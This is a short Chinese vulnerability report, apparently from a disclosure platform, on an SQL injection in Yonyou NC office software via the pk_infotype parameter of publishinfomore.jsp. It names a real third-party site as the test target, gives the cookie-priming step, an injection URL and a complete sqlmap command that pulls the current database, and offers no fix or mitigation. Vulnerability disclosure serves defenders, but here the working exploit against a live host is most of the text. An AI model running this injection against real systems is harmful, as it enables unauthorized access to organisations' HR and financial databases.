用友NC综合办公系统SQL注入漏洞,可同时影响多个办公系统(HR资源管理系统、UFO报表系统等)的数据库
注入链接:/epp/detail/publishinfomore.jsp?pk_infotype=
注入参数:pk_infotype
必须先访问/epp/index.jsp后产生cookie才能进行SQL注入
测试案例:
http://nc.xhlbdc.com
![](https://images.seebug.org/contribute/90008d21-02bf-43ba-949e-09644c62356d-2015-10-10 17_36_45.png)
访问首页产生cookie: http://nc.xhlbdc.com/epp/index.jsp
![](https://images.seebug.org/contribute/670abce0-9fe2-40e2-91d5-d088e5354912-2015-10-10 17_37_27.png)
注入链接:http://nc.xhlbdc.com/epp/detail/publishinfomore.jsp?pk_infotype=0001F41000000001ILCW'
![](https://images.seebug.org/contribute/e046435e-7c88-44f3-bc6f-9bd4fbbee789-2015-10-10 17_38_01.png)
【SQLMAP注入】
burpsuite抓包保存为nc.xhlbdc.com.txt文件后,使用SQLMAP注入:
python sqlmap.py -r /c/nc.xhlbdc.com.txt -p pk_infotype --level 5 --risk 3 --dbms oracle --batch --random-agent --technique=T --current-db -v 3
![](https://images.seebug.org/contribute/b73dd85f-91fd-43d0-9d23-52f7958769fa-2015-10-10 17_38_36.png)
暂无评论